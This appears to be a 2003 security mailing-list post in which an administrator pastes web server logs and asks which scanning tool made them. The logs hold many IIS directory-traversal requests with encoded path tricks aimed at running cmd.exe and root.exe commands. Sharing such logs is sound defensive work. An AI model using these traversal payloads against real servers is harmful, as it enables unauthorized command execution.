Anyone know this tool?

• Previous message: Paul Tinsley: "RE: Exploit for Windows RPC may be in the wild!"
• In reply to: Shafik Yaghmour: "Re: "access_log?hello" ?"
• Next in thread: Jason Rumney: "Re: Anyone know this tool?"
• Next in thread: Dave Paris: "Re: Port 0 packets"
• Reply: Jason Rumney: "Re: Anyone know this tool?"
• Reply: James Williams: "RE: Anyone know this tool?"
• Reply: Jason Falciola: "Re: Anyone know this tool?"
• Reply: Jason Falciola: "Re: Anyone know this tool?"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Does anyone happen to know what tool this is? I've seen the exact same  
scans on 6 of our servers on completely different networks. All the  
scans have been from different source IP's and all the servers were hit  
within a space of a few hours.

Curiosity is getting the better of me since i've never seen this exact  
pattern before :)

64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET  
/scripts/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET  
/MSADC/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET  
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET  
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET  
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET  
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir  
HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET  
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir  
HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET  
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../ 
winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET  
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-"  
"-"
64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET  
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-"  
"-"
64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET  
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-"  
"-"
64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET  
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-"  
"-"
64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET  
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-"  
"-"
64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET  
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET  
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -  
"-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:43 -0500] "GET  
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"

Danny
Work - http://www.eBoundary.com - Secure, FreeBSD hosting.
Play - http://www.eBoundary.net - Who really sets your electronic  
boundaries?
AIM: eBoundaryTch  | ICQ: 3090141


---------------------------------------------------------------------------
----------------------------------------------------------------------------

• Next message: Paul Tinsley: "RE: Exploit for Windows RPC may be in the wild!"
• Previous message: Paul Tinsley: "RE: Exploit for Windows RPC may be in the wild!"
• In reply to: Shafik Yaghmour: "Re: "access_log?hello" ?"
• Next in thread: Jason Rumney: "Re: Anyone know this tool?"
• Next in thread: Dave Paris: "Re: Port 0 packets"
• Reply: Jason Rumney: "Re: Anyone know this tool?"
• Reply: James Williams: "RE: Anyone know this tool?"
• Reply: Jason Falciola: "Re: Anyone know this tool?"
• Reply: Jason Falciola: "Re: Anyone know this tool?"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Jul 29 2003 - 09:37:13 PDT